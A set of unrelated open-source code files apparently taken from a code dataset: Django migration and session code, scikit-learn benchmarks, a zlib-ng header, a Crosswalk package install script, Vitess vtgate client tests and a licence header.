supplier_refund_inv_id = invoice_obj.refund(cr, uid, [lot.ach_inv_id.id])
if lot.sel_inv_id:
customer_refund_inv_id = invoice_obj.refund(cr, uid, [lot.sel_inv_id.id])
return {'type': 'ir.actions.act_window_close'}
_columns = {
}
auction_lots_cancel()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4: | unknown | codeparrot/codeparrot-clean | ||
import sys
import os
import operator
from optparse import make_option
from django.apps import apps
from django.core.management.base import BaseCommand, CommandError
from django.db.migrations import Migration
from django.db.migrations.loader import MigrationLoader
from django.db.migrations.autodetector import MigrationAutodetector
from django.db.migrations.questioner import MigrationQuestioner, InteractiveMigrationQuestioner
from django.db.migrations.state import ProjectState
from django.db.migrations.writer import MigrationWriter
from django.utils.six import iteritems
from django.utils.six.moves import reduce
class Command(BaseCommand):
option_list = BaseCommand.option_list + (
make_option('--dry-run', action='store_true', dest='dry_run', default=False,
help="Just show what migrations would be made; don't actually write them."),
make_option('--merge', action='store_true', dest='merge', default=False,
help="Enable fixing of migration conflicts."),
make_option('--empty', action='store_true', dest='empty', default=False,
help="Create an empty migration."),
make_option('--noinput', action='store_false', dest='interactive', default=True,
help='Tells Django to NOT prompt the user for input of any kind.'),
)
help = "Creates new migration(s) for apps."
usage_str = "Usage: ./manage.py makemigrations [--dry-run] [app [app ...]]"
args = "[app_label [app_label ...]]"
def handle(self, *app_labels, **options):
self.verbosity = int(options.get('verbosity'))
self.interactive = options.get('interactive')
self.dry_run = options.get('dry_run', False)
self.merge = options.get('merge', False)
self.empty = options.get('empty', False)
# Make sure the app they asked for exists
app_labels = set(app_labels)
bad_app_labels = set()
for app_label in app_labels:
try:
apps.get_app_config(app_label)
except LookupError:
bad_app_labels.add(app_label)
if bad_app_labels:
for app_label in bad_app_labels:
self.stderr.write("App '%s' could not be found. Is it in INSTALLED_APPS?" % app_label)
sys.exit(2)
# Load the current graph state. Pass in None for the connection so
# the loader doesn't try to resolve replaced migrations from DB.
loader = MigrationLoader(None, ignore_no_migrations=True)
# Before anything else, see if there's conflicting apps and drop out
# hard if there are any and they don't want to merge
conflicts = loader.detect_conflicts()
# If app_labels is specified, filter out conflicting migrations for unspecified apps
if app_labels:
conflicts = dict(
(app_label, conflict) for app_label, conflict in iteritems(conflicts)
if app_label in app_labels
)
if conflicts and not self.merge:
name_str = "; ".join(
"%s in %s" % (", ".join(names), app)
for app, names in conflicts.items()
)
raise CommandError("Conflicting migrations detected (%s).\nTo fix them run 'python manage.py makemigrations --merge'" % name_str)
# If they want to merge and there's nothing to merge, then politely exit
if self.merge and not conflicts:
self.stdout.write("No conflicts detected to merge.")
return
# If they want to merge and there is something to merge, then
# divert into the merge code
if self.merge and conflicts:
return self.handle_merge(loader, conflicts)
# Set up autodetector
autodetector = MigrationAutodetector(
loader.project_state(),
ProjectState.from_apps(apps),
InteractiveMigrationQuestioner(specified_apps=app_labels, dry_run=self.dry_run),
)
# If they want to make an empty migration, make one for each app
if self.empty:
if not app_labels:
raise CommandError("You must supply at least one app label when using --empty.")
# Make a fake changes() result we can pass to arrange_for_graph
changes = dict(
(app, [Migration("custom", app)])
for app in app_labels
)
changes = autodetector.arrange_for_graph(changes, loader.graph)
self.write_migration_files(changes)
return
# Detect changes
changes = autodetector.changes(
graph=loader.graph,
trim_to_apps=app_labels or None,
convert_apps=app_labels or None,
)
# No changes? Tell them.
if not changes and self.verbosity >= 1:
if len(app_labels) == 1:
self.stdout.write("No changes detected in app '%s'" % app_labels.pop())
elif len(app_labels) > 1:
self.stdout.write("No changes detected in apps '%s'" % ("', '".join(app_labels)))
else:
self.stdout.write("No changes detected")
return
self.write_migration_files(changes)
def write_migration_files(self, changes):
"""
Takes a changes dict and writes them out as migration files.
"""
directory_created = {}
for app_label, app_migrations in changes.items():
if self.verbosity >= 1:
self.stdout.write(self.style.MIGRATE_HEADING("Migrations for '%s':" % app_label) + "\n")
for migration in app_migrations:
# Describe the migration
writer = MigrationWriter(migration)
if self.verbosity >= 1:
self.stdout.write(" %s:\n" % (self.style.MIGRATE_LABEL(writer.filename),))
for operation in migration.operations:
self.stdout.write(" - %s\n" % operation.describe())
if not self.dry_run:
# Write the migrations file to the disk.
migrations_directory = os.path.dirname(writer.path)
if not directory_created.get(app_label, False):
if not os.path.isdir(migrations_directory):
os.mkdir(migrations_directory)
init_path = os.path.join(migrations_directory, "__init__.py")
if not os.path.isfile(init_path):
open(init_path, "w").close()
# We just do this once per app
directory_created[app_label] = True
migration_string = writer.as_string()
with open(writer.path, "wb") as fh:
fh.write(migration_string)
elif self.verbosity == 3:
# Alternatively, makemigrations --dry-run --verbosity 3
# will output the migrations to stdout rather than saving
# the file to the disk.
self.stdout.write(self.style.MIGRATE_HEADING("Full migrations file '%s':" % writer.filename) + "\n")
self.stdout.write("%s\n" % writer.as_string())
def handle_merge(self, loader, conflicts):
"""
Handles merging together conflicted migrations interactively,
if it's safe; otherwise, advises on how to fix it.
"""
if self.interactive:
questioner = InteractiveMigrationQuestioner()
else:
questioner = MigrationQuestioner(defaults={'ask_merge': True})
for app_label, migration_names in conflicts.items():
# Grab out the migrations in question, and work out their
# common ancestor.
merge_migrations = []
for migration_name in migration_names:
migration = loader.get_migration(app_label, migration_name)
migration.ancestry = loader.graph.forwards_plan((app_label, migration_name))
merge_migrations.append(migration)
common_ancestor = None
for level in zip(*[m.ancestry for m in merge_migrations]):
if reduce(operator.eq, level):
common_ancestor = level[0]
else:
break
if common_ancestor is None:
raise ValueError("Could not find common ancestor of %s" % migration_names)
# Now work out the operations along each divergent branch
for migration in merge_migrations:
migration.branch = migration.ancestry[
(migration.ancestry.index(common_ancestor) + 1):
]
migration.merged_operations = []
for node_app, node_name in migration.branch:
migration.merged_operations.extend(
loader.get_migration(node_app, node_name).operations
)
# In future, this could use some of the Optimizer code
# (can_optimize_through) to automatically see if they're
# mergeable. For now, we always just prompt the user.
if self.verbosity > 0:
self.stdout.write(self.style.MIGRATE_HEADING("Merging %s" % app_label))
for migration in merge_migrations:
self.stdout.write(self.style.MIGRATE_LABEL(" Branch %s" % migration.name))
for operation in migration.merged_operations:
self.stdout.write(" - %s\n" % operation.describe())
if questioner.ask_merge(app_label):
# If they still want to merge it, then write out an empty
# file depending on the migrations needing merging.
numbers = [
MigrationAutodetector.parse_number(migration.name)
for migration in merge_migrations
]
try:
biggest_number = max([x for x in numbers if x is not None])
except ValueError:
biggest_number = 1
subclass = type("Migration", (Migration, ), {
"dependencies": [(app_label, migration.name) for migration in merge_migrations],
})
new_migration = subclass("%04i_merge" % (biggest_number + 1), app_label)
writer = MigrationWriter(new_migration)
with open(writer.path, "wb") as fh:
fh.write(writer.as_string())
if self.verbosity > 0:
self.stdout.write("\nCreated new merge migration %s" % writer.path) | unknown | codeparrot/codeparrot-clean | ||
from collections import defaultdict
from time import time
import numpy as np
from numpy import random as nr
from sklearn.cluster import KMeans, MiniBatchKMeans
def compute_bench(samples_range, features_range):
it = 0
results = defaultdict(lambda: [])
chunk = 100
max_it = len(samples_range) * len(features_range)
for n_samples in samples_range:
for n_features in features_range:
it += 1
print("==============================")
print("Iteration %03d of %03d" % (it, max_it))
print("==============================")
print()
data = nr.randint(-50, 51, (n_samples, n_features))
print("K-Means")
tstart = time()
kmeans = KMeans(init="k-means++", n_clusters=10).fit(data)
delta = time() - tstart
print("Speed: %0.3fs" % delta)
print("Inertia: %0.5f" % kmeans.inertia_)
print()
results["kmeans_speed"].append(delta)
results["kmeans_quality"].append(kmeans.inertia_)
print("Fast K-Means")
# let's prepare the data in small chunks
mbkmeans = MiniBatchKMeans(
init="k-means++", n_clusters=10, batch_size=chunk
)
tstart = time()
mbkmeans.fit(data)
delta = time() - tstart
print("Speed: %0.3fs" % delta)
print("Inertia: %f" % mbkmeans.inertia_)
print()
print()
results["MiniBatchKMeans Speed"].append(delta)
results["MiniBatchKMeans Quality"].append(mbkmeans.inertia_)
return results
def compute_bench_2(chunks):
results = defaultdict(lambda: [])
n_features = 50000
means = np.array(
[
[1, 1],
[-1, -1],
[1, -1],
[-1, 1],
[0.5, 0.5],
[0.75, -0.5],
[-1, 0.75],
[1, 0],
]
)
X = np.empty((0, 2))
for i in range(8):
X = np.r_[X, means[i] + 0.8 * np.random.randn(n_features, 2)]
max_it = len(chunks)
it = 0
for chunk in chunks:
it += 1
print("==============================")
print("Iteration %03d of %03d" % (it, max_it))
print("==============================")
print()
print("Fast K-Means")
tstart = time()
mbkmeans = MiniBatchKMeans(init="k-means++", n_clusters=8, batch_size=chunk)
mbkmeans.fit(X)
delta = time() - tstart
print("Speed: %0.3fs" % delta)
print("Inertia: %0.3fs" % mbkmeans.inertia_)
print()
results["MiniBatchKMeans Speed"].append(delta)
results["MiniBatchKMeans Quality"].append(mbkmeans.inertia_)
return results
if __name__ == "__main__":
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import axes3d # register the 3d projection # noqa: F401
samples_range = np.linspace(50, 150, 5).astype(int)
features_range = np.linspace(150, 50000, 5).astype(int)
chunks = np.linspace(500, 10000, 15).astype(int)
results = compute_bench(samples_range, features_range)
results_2 = compute_bench_2(chunks)
max_time = max(
[max(i) for i in [t for (label, t) in results.items() if "speed" in label]]
)
max_inertia = max(
[max(i) for i in [t for (label, t) in results.items() if "speed" not in label]]
)
fig = plt.figure("scikit-learn K-Means benchmark results")
for c, (label, timings) in zip("brcy", sorted(results.items())):
if "speed" in label:
ax = fig.add_subplot(2, 2, 1, projection="3d")
ax.set_zlim3d(0.0, max_time * 1.1)
else:
ax = fig.add_subplot(2, 2, 2, projection="3d")
ax.set_zlim3d(0.0, max_inertia * 1.1)
X, Y = np.meshgrid(samples_range, features_range)
Z = np.asarray(timings).reshape(samples_range.shape[0], features_range.shape[0])
ax.plot_surface(X, Y, Z.T, cstride=1, rstride=1, color=c, alpha=0.5)
ax.set_xlabel("n_samples")
ax.set_ylabel("n_features")
i = 0
for c, (label, timings) in zip("br", sorted(results_2.items())):
i += 1
ax = fig.add_subplot(2, 2, i + 2)
y = np.asarray(timings)
ax.plot(chunks, y, color=c, alpha=0.8)
ax.set_xlabel("Chunks")
ax.set_ylabel(label)
plt.show() | python | github | https://github.com/scikit-learn/scikit-learn | benchmarks/bench_plot_fastkmeans.py |
import logging
from django.contrib.sessions.backends.base import (
CreateError, SessionBase, UpdateError,
)
from django.core.exceptions import SuspiciousOperation
from django.db import DatabaseError, IntegrityError, router, transaction
from django.utils import timezone
from django.utils.encoding import force_text
from django.utils.functional import cached_property
class SessionStore(SessionBase):
"""
Implements database session store.
"""
def __init__(self, session_key=None):
super(SessionStore, self).__init__(session_key)
@classmethod
def get_model_class(cls):
# Avoids a circular import and allows importing SessionStore when
# django.contrib.sessions is not in INSTALLED_APPS.
from django.contrib.sessions.models import Session
return Session
@cached_property
def model(self):
return self.get_model_class()
def load(self):
try:
s = self.model.objects.get(
session_key=self.session_key,
expire_date__gt=timezone.now()
)
return self.decode(s.session_data)
except (self.model.DoesNotExist, SuspiciousOperation) as e:
if isinstance(e, SuspiciousOperation):
logger = logging.getLogger('django.security.%s' % e.__class__.__name__)
logger.warning(force_text(e))
self._session_key = None
return {}
def exists(self, session_key):
return self.model.objects.filter(session_key=session_key).exists()
def create(self):
while True:
self._session_key = self._get_new_session_key()
try:
# Save immediately to ensure we have a unique entry in the
# database.
self.save(must_create=True)
except CreateError:
# Key wasn't unique. Try again.
continue
self.modified = True
return
def create_model_instance(self, data):
"""
Return a new instance of the session model object, which represents the
current session state. Intended to be used for saving the session data
to the database.
"""
return self.model(
session_key=self._get_or_create_session_key(),
session_data=self.encode(data),
expire_date=self.get_expiry_date(),
)
def save(self, must_create=False):
"""
Saves the current session data to the database. If 'must_create' is
True, a database error will be raised if the saving operation doesn't
create a *new* entry (as opposed to possibly updating an existing
entry).
"""
if self.session_key is None:
return self.create()
data = self._get_session(no_load=must_create)
obj = self.create_model_instance(data)
using = router.db_for_write(self.model, instance=obj)
try:
with transaction.atomic(using=using):
obj.save(force_insert=must_create, force_update=not must_create, using=using)
except IntegrityError:
if must_create:
raise CreateError
raise
except DatabaseError:
if not must_create:
raise UpdateError
raise
def delete(self, session_key=None):
if session_key is None:
if self.session_key is None:
return
session_key = self.session_key
try:
self.model.objects.get(session_key=session_key).delete()
except self.model.DoesNotExist:
pass
@classmethod
def clear_expired(cls):
cls.get_model_class().objects.filter(expire_date__lt=timezone.now()).delete() | unknown | codeparrot/codeparrot-clean | ||
#ifndef TREES_H_
#define TREES_H_
/* Constants */
#define DIST_CODE_LEN 512
/* see definition of array dist_code in trees.c */
#define MAX_BL_BITS 7
/* Bit length codes must not exceed MAX_BL_BITS bits */
#define REP_3_6 16
/* repeat previous bit length 3-6 times (2 bits of repeat count) */
#define REPZ_3_10 17
/* repeat a zero length 3-10 times (3 bits of repeat count) */
#define REPZ_11_138 18
/* repeat a zero length 11-138 times (7 bits of repeat count) */
static const int extra_lbits[LENGTH_CODES] /* extra bits for each length code */
= {0,0,0,0,0,0,0,0,1,1,1,1,2,2,2,2,3,3,3,3,4,4,4,4,5,5,5,5,0};
static const int extra_dbits[D_CODES] /* extra bits for each distance code */
= {0,0,0,0,1,1,2,2,3,3,4,4,5,5,6,6,7,7,8,8,9,9,10,10,11,11,12,12,13,13};
static const int extra_blbits[BL_CODES] /* extra bits for each bit length code */
= {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,3,7};
static const unsigned char bl_order[BL_CODES]
= {16,17,18,0,8,7,9,6,10,5,11,4,12,3,13,2,14,1,15};
/* The lengths of the bit length codes are sent in order of decreasing
* probability, to avoid transmitting the lengths for unused bit length codes.
*/
/* Function definitions */
void gen_codes (ct_data *tree, int max_code, uint16_t *bl_count);
#endif | c | github | https://github.com/opencv/opencv | 3rdparty/zlib-ng/trees.h |
from sklearn.ensemble import (
GradientBoostingClassifier,
HistGradientBoostingClassifier,
RandomForestClassifier,
)
from .common import Benchmark, Estimator, Predictor
from .datasets import (
_20newsgroups_highdim_dataset,
_20newsgroups_lowdim_dataset,
_synth_classification_dataset,
)
from .utils import make_gen_classif_scorers
class RandomForestClassifierBenchmark(Predictor, Estimator, Benchmark):
"""
Benchmarks for RandomForestClassifier.
"""
param_names = ["representation", "n_jobs"]
params = (["dense", "sparse"], Benchmark.n_jobs_vals)
def setup_cache(self):
super().setup_cache()
def make_data(self, params):
representation, n_jobs = params
if representation == "sparse":
data = _20newsgroups_highdim_dataset()
else:
data = _20newsgroups_lowdim_dataset()
return data
def make_estimator(self, params):
representation, n_jobs = params
n_estimators = 500 if Benchmark.data_size == "large" else 100
estimator = RandomForestClassifier(
n_estimators=n_estimators,
min_samples_split=10,
max_features="log2",
n_jobs=n_jobs,
random_state=0,
)
return estimator
def make_scorers(self):
make_gen_classif_scorers(self)
class GradientBoostingClassifierBenchmark(Predictor, Estimator, Benchmark):
"""
Benchmarks for GradientBoostingClassifier.
"""
param_names = ["representation"]
params = (["dense", "sparse"],)
def setup_cache(self):
super().setup_cache()
def make_data(self, params):
(representation,) = params
if representation == "sparse":
data = _20newsgroups_highdim_dataset()
else:
data = _20newsgroups_lowdim_dataset()
return data
def make_estimator(self, params):
(representation,) = params
n_estimators = 100 if Benchmark.data_size == "large" else 10
estimator = GradientBoostingClassifier(
n_estimators=n_estimators,
max_features="log2",
subsample=0.5,
random_state=0,
)
return estimator
def make_scorers(self):
make_gen_classif_scorers(self)
class HistGradientBoostingClassifierBenchmark(Predictor, Estimator, Benchmark):
"""
Benchmarks for HistGradientBoostingClassifier.
"""
param_names = []
params = ()
def setup_cache(self):
super().setup_cache()
def make_data(self, params):
data = _synth_classification_dataset(
n_samples=10000, n_features=100, n_classes=5
)
return data
def make_estimator(self, params):
estimator = HistGradientBoostingClassifier(
max_iter=100, max_leaf_nodes=15, early_stopping=False, random_state=0
)
return estimator
def make_scorers(self):
make_gen_classif_scorers(self) | python | github | https://github.com/scikit-learn/scikit-learn | asv_benchmarks/benchmarks/ensemble.py |
#!/usr/bin/env python
import os
import sys
import subprocess
from optparse import OptionParser
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
PARAMETERS = None
def doCMD(cmd):
print "-->> \"%s\"" % cmd
output = []
cmd_return_code = 1
cmd_proc = subprocess.Popen(
cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
while True:
output_line = cmd_proc.stdout.readline().strip("\r\n")
cmd_return_code = cmd_proc.poll()
if output_line == '' and cmd_return_code is not None:
break
sys.stdout.write("%s\n" % output_line)
sys.stdout.flush()
output.append(output_line)
return (cmd_return_code, output)
def uninstPKGs():
action_status = True
for root, dirs, files in os.walk(SCRIPT_DIR):
for file in files:
if file.endswith(".deb"):
debName = os.path.basename(os.path.splitext(file)[0])
pkg_id = debName.split("_")[0]
if doCMD("which %s" % pkg_id)[0] == 0:
(return_code, output) = doCMD(
"sudo dpkg -P %s" % pkg_id)
if return_code != 0:
action_status = False
break
return action_status
def instPKGs():
action_status = True
for root, dirs, files in os.walk(SCRIPT_DIR):
for file in files:
if file.endswith(".deb") and file.find("upgrade") == -1:
cmd = "sudo dpkg -i %s/%s" % (root, file)
(return_code, output) = doCMD(cmd)
if return_code != 0:
action_status = False
break
return action_status
def initEnv():
action_status = True
xwalk_dir = "/usr/bin"
cmd = "which xwalk"
(return_code, xwalk_path) = doCMD(cmd)
if return_code == 0:
xwalk_dir = os.path.dirname(xwalk_path[0])
cmdList = ["sudo rm -rf %s/xwalk", "sudo cp -rf xwalk.sh %s/", "sudo ln /usr/bin/xwalk.sh %s/xwalk"]
for cmdstr in cmdList:
cmd = cmdstr % xwalk_dir
(return_code, xwalk_path) = doCMD(cmd)
if return_code != 0:
action_status = False
break
return action_status
def main():
try:
usage = "usage: inst.py -i"
opts_parser = OptionParser(usage=usage)
opts_parser.add_option(
"-i", dest="binstpkg", action="store_true", help="Install package")
opts_parser.add_option(
"-u", dest="buninstpkg", action="store_true", help="Uninstall package")
global PARAMETERS
(PARAMETERS, args) = opts_parser.parse_args()
except Exception as e:
print "Got wrong option: %s, exit ..." % e
sys.exit(1)
if PARAMETERS.binstpkg and PARAMETERS.buninstpkg:
print "-i and -u are conflict"
sys.exit(1)
if PARAMETERS.buninstpkg:
if not uninstPKGs():
sys.exit(1)
else:
#if not initEnv():
#sys.exit(1)
if not instPKGs():
sys.exit(1)
if __name__ == "__main__":
main()
sys.exit(0) | unknown | codeparrot/codeparrot-clean | ||
#!/usr/bin/env python
#
# Copyright 2015 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can
# be found in the LICENSE file.
"""This test uses vtgateclienttest to test the vtdb python vtgate client.
"""
import logging
import struct
import unittest
import environment
from protocols_flavor import protocols_flavor
import utils
from vtdb import dbexceptions
from vtdb import keyrange
from vtdb import keyrange_constants
from vtdb import vtgate_client
from vtdb import vtgate_cursor
vtgateclienttest_process = None
vtgateclienttest_port = None
vtgateclienttest_grpc_port = None
def setUpModule():
global vtgateclienttest_process
global vtgateclienttest_port
global vtgateclienttest_grpc_port
try:
environment.topo_server().setup()
vtgateclienttest_port = environment.reserve_ports(1)
args = environment.binary_args('vtgateclienttest') + [
'-log_dir', environment.vtlogroot,
'-port', str(vtgateclienttest_port),
]
if protocols_flavor().vtgate_python_protocol() == 'grpc':
vtgateclienttest_grpc_port = environment.reserve_ports(1)
args.extend(['-grpc_port', str(vtgateclienttest_grpc_port)])
if protocols_flavor().service_map():
args.extend(['-service_map', ','.join(protocols_flavor().service_map())])
vtgateclienttest_process = utils.run_bg(args)
utils.wait_for_vars('vtgateclienttest', vtgateclienttest_port)
except:
tearDownModule()
raise
def tearDownModule():
utils.kill_sub_process(vtgateclienttest_process, soft=True)
if vtgateclienttest_process:
vtgateclienttest_process.wait()
environment.topo_server().teardown()
class TestPythonClientBase(unittest.TestCase):
"""Base class for Python client tests."""
CONNECT_TIMEOUT = 10.0
# A packed keyspace_id from the middle of the full keyrange.
KEYSPACE_ID_0X80 = struct.Struct('!Q').pack(0x80 << 56)
def setUp(self):
super(TestPythonClientBase, self).setUp()
addr = 'localhost:%d' % vtgateclienttest_port
protocol = protocols_flavor().vtgate_python_protocol()
self.conn = vtgate_client.connect(protocol, addr, 30.0)
logging.info(
'Start: %s, protocol %s.',
'.'.join(self.id().split('.')[-2:]), protocol)
def tearDown(self):
self.conn.close()
def _open_keyspace_ids_cursor(self):
return self.conn.cursor(
'keyspace', 'master', keyspace_ids=[self.KEYSPACE_ID_0X80])
def _open_keyranges_cursor(self):
kr = keyrange.KeyRange(keyrange_constants.NON_PARTIAL_KEYRANGE)
return self.conn.cursor('keyspace', 'master', keyranges=[kr])
def _open_batch_cursor(self):
return self.conn.cursor(keyspace=None, tablet_type='master')
def _open_stream_keyranges_cursor(self):
kr = keyrange.KeyRange(keyrange_constants.NON_PARTIAL_KEYRANGE)
return self.conn.cursor(
'keyspace', 'master', keyranges=[kr],
cursorclass=vtgate_cursor.StreamVTGateCursor)
def _open_stream_keyspace_ids_cursor(self):
return self.conn.cursor(
'keyspace', 'master', keyspace_ids=[self.KEYSPACE_ID_0X80],
cursorclass=vtgate_cursor.StreamVTGateCursor)
class TestPythonClientErrors(TestPythonClientBase):
"""Test cases to verify that the Python client can handle errors correctly."""
def test_execute_integrity_errors(self):
"""Test we raise dbexceptions.IntegrityError for Execute calls."""
# Special query that makes vtgateclienttest return an IntegrityError.
self._verify_exception_for_execute(
'error://integrity error',
dbexceptions.IntegrityError)
def test_partial_integrity_errors(self):
"""Raise an IntegrityError when Execute returns a partial error."""
# Special query that makes vtgateclienttest return a partial error.
self._verify_exception_for_execute(
'partialerror://integrity error',
dbexceptions.IntegrityError)
def _verify_exception_for_execute(self, query, exception):
"""Verify that we raise a specific exception for all Execute calls.
Args:
query: query string to use for execute calls.
exception: exception class that we expect the execute call to raise.
"""
# FIXME(alainjobart) add test for Execute once factory supports it
# FIXME(alainjobart) add test for ExecuteShards once factory supports it
# ExecuteKeyspaceIds test
cursor = self._open_keyspace_ids_cursor()
with self.assertRaises(exception):
cursor.execute(query, {})
cursor.close()
# ExecuteKeyRanges test
cursor = self._open_keyranges_cursor()
with self.assertRaises(exception):
cursor.execute(query, {})
cursor.close()
# ExecuteEntityIds test
cursor = self.conn.cursor('keyspace', 'master')
with self.assertRaises(exception):
cursor.execute(
query, {},
entity_keyspace_id_map={1: self.KEYSPACE_ID_0X80},
entity_column_name='user_id')
cursor.close()
# ExecuteBatchKeyspaceIds test
cursor = self._open_batch_cursor()
with self.assertRaises(exception):
cursor.executemany(
sql=None,
params_list=[
dict(
sql=query,
bind_variables={},
keyspace='keyspace',
keyspace_ids=[self.KEYSPACE_ID_0X80])])
cursor.close()
# ExecuteBatchShard test
cursor = self._open_batch_cursor()
with self.assertRaises(exception):
cursor.executemany(
sql=None,
params_list=[
dict(
sql=query,
bind_variables={},
keyspace='keyspace',
shards=[keyrange_constants.SHARD_ZERO])])
cursor.close()
def _verify_exception_for_stream_execute(self, query, exception):
"""Verify that we raise a specific exception for all StreamExecute calls.
Args:
query: query string to use for StreamExecute calls.
exception: exception class that we expect StreamExecute to raise.
"""
# StreamExecuteKeyspaceIds test
cursor = self._open_stream_keyspace_ids_cursor()
with self.assertRaises(exception):
cursor.execute(query, {})
cursor.close()
# StreamExecuteKeyRanges test
cursor = self._open_stream_keyranges_cursor()
with self.assertRaises(exception):
cursor.execute(query, {})
cursor.close()
def test_streaming_integrity_error(self):
"""Test we raise dbexceptions.IntegrityError for StreamExecute calls."""
# TODO(aaijazi): this test doesn't work for all clients yet.
if protocols_flavor().vtgate_python_protocol() != 'gorpc':
return
self._verify_exception_for_stream_execute(
'error://integrity error',
dbexceptions.IntegrityError)
def test_transient_error(self):
"""Test we raise dbexceptions.TransientError for Execute calls."""
# TODO(aaijazi): this test doesn't work for all clients yet.
if protocols_flavor().vtgate_python_protocol() != 'gorpc':
return
# Special query that makes vtgateclienttest return a TransientError.
self._verify_exception_for_execute(
'error://transient error',
dbexceptions.TransientError)
def test_streaming_transient_error(self):
"""Test we raise dbexceptions.IntegrityError for StreamExecute calls."""
# TODO(aaijazi): this test doesn't work for all clients yet.
if protocols_flavor().vtgate_python_protocol() != 'gorpc':
return
self._verify_exception_for_stream_execute(
'error://transient error',
dbexceptions.TransientError)
def test_error(self):
"""Test a regular server error raises the right exception."""
error_request = 'error://unknown error'
error_caller_id = vtgate_client.CallerID(principal=error_request)
# Begin test
with self.assertRaisesRegexp(dbexceptions.DatabaseError, 'forced error'):
self.conn.begin(error_caller_id)
# Commit test
with self.assertRaisesRegexp(dbexceptions.DatabaseError, 'forced error'):
self.conn.begin(error_caller_id)
# Rollback test
with self.assertRaisesRegexp(dbexceptions.DatabaseError, 'forced error'):
self.conn.begin(error_caller_id)
# GetSrvKeyspace test
with self.assertRaisesRegexp(dbexceptions.DatabaseError, 'forced error'):
self.conn.get_srv_keyspace(error_request)
class TestPythonClient(TestPythonClientBase):
"""Non-error test cases for the Python client."""
def test_success_get_srv_keyspace(self):
"""Test we get the right results from get_srv_keyspace.
We only test the successful cases.
"""
# big has one big shard
big = self.conn.get_srv_keyspace('big')
self.assertEquals(big.name, 'big')
self.assertEquals(big.sharding_col_name, 'sharding_column_name')
self.assertEquals(big.sharding_col_type, keyrange_constants.KIT_UINT64)
self.assertEquals(big.served_from, {'master': 'other_keyspace'})
self.assertEquals(big.get_shards('replica'),
[{'Name': 'shard0',
'KeyRange': {
'Start': '\x40\x00\x00\x00\x00\x00\x00\x00',
'End': '\x80\x00\x00\x00\x00\x00\x00\x00',
}}])
self.assertEquals(big.get_shard_count('replica'), 1)
self.assertEquals(big.get_shard_count('rdonly'), 0)
self.assertEquals(big.get_shard_names('replica'), ['shard0'])
self.assertEquals(big.keyspace_id_to_shard_name_for_db_type(
0x6000000000000000, 'replica'), 'shard0')
with self.assertRaises(ValueError):
big.keyspace_id_to_shard_name_for_db_type(0x2000000000000000, 'replica')
# small has no shards
small = self.conn.get_srv_keyspace('small')
self.assertEquals(small.name, 'small')
self.assertEquals(small.sharding_col_name, '')
self.assertEquals(small.sharding_col_type, keyrange_constants.KIT_UNSET)
self.assertEquals(small.served_from, {})
self.assertEquals(small.get_shards('replica'), [])
self.assertEquals(small.get_shard_count('replica'), 0)
with self.assertRaises(ValueError):
small.keyspace_id_to_shard_name_for_db_type(0x6000000000000000, 'replica')
def test_effective_caller_id(self):
"""Test that the passed in effective_caller_id is parsed correctly.
Pass a special sql query that sends the expected
effective_caller_id through different vtgate interfaces. Make sure
the good_effective_caller_id works, and the
bad_effective_caller_id raises a DatabaseError.
"""
# Special query that makes vtgateclienttest match effective_caller_id.
effective_caller_id_test_query = (
'callerid://{"principal":"pr", "component":"co", "subcomponent":"su"}')
good_effective_caller_id = vtgate_client.CallerID(
principal='pr', component='co', subcomponent='su')
bad_effective_caller_id = vtgate_client.CallerID(
principal='pr_wrong', component='co_wrong', subcomponent='su_wrong')
def check_good_and_bad_effective_caller_ids(cursor, cursor_execute_method):
cursor.set_effective_caller_id(good_effective_caller_id)
with self.assertRaises(dbexceptions.DatabaseError) as cm:
cursor_execute_method(cursor)
self.assertIn('SUCCESS:', str(cm.exception))
cursor.set_effective_caller_id(bad_effective_caller_id)
with self.assertRaises(dbexceptions.DatabaseError) as cm:
cursor_execute_method(cursor)
self.assertNotIn('SUCCESS:', str(cm.exception))
def cursor_execute_keyspace_ids_method(cursor):
cursor.execute(effective_caller_id_test_query, {})
check_good_and_bad_effective_caller_ids(
self._open_keyspace_ids_cursor(), cursor_execute_keyspace_ids_method)
def cursor_execute_key_ranges_method(cursor):
cursor.execute(effective_caller_id_test_query, {})
check_good_and_bad_effective_caller_ids(
self._open_keyranges_cursor(), cursor_execute_key_ranges_method)
def cursor_execute_entity_ids_method(cursor):
cursor.execute(
effective_caller_id_test_query, {},
entity_keyspace_id_map={1: self.KEYSPACE_ID_0X80},
entity_column_name='user_id')
check_good_and_bad_effective_caller_ids(
self.conn.cursor('keyspace', 'master'),
cursor_execute_entity_ids_method)
def cursor_execute_batch_keyspace_ids_method(cursor):
cursor.executemany(
sql=None,
params_list=[dict(
sql=effective_caller_id_test_query, bind_variables={},
keyspace='keyspace',
keyspace_ids=[self.KEYSPACE_ID_0X80])])
check_good_and_bad_effective_caller_ids(
self._open_batch_cursor(), cursor_execute_batch_keyspace_ids_method)
def cursor_execute_batch_shard_method(cursor):
cursor.executemany(
sql=None,
params_list=[dict(
sql=effective_caller_id_test_query, bind_variables={},
keyspace='keyspace',
shards=[keyrange_constants.SHARD_ZERO])])
check_good_and_bad_effective_caller_ids(
self._open_batch_cursor(), cursor_execute_batch_shard_method)
def cursor_stream_execute_keyspace_ids_method(cursor):
cursor.execute(sql=effective_caller_id_test_query, bind_variables={})
check_good_and_bad_effective_caller_ids(
self._open_stream_keyspace_ids_cursor(),
cursor_stream_execute_keyspace_ids_method)
def cursor_stream_execute_keyranges_method(cursor):
cursor.execute(sql=effective_caller_id_test_query, bind_variables={})
check_good_and_bad_effective_caller_ids(
self._open_stream_keyranges_cursor(),
cursor_stream_execute_keyranges_method)
if __name__ == '__main__':
utils.main() | unknown | codeparrot/codeparrot-clean | ||
#
#
# Copyright (C) 2007, 2011, 2012, 2013 Google Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
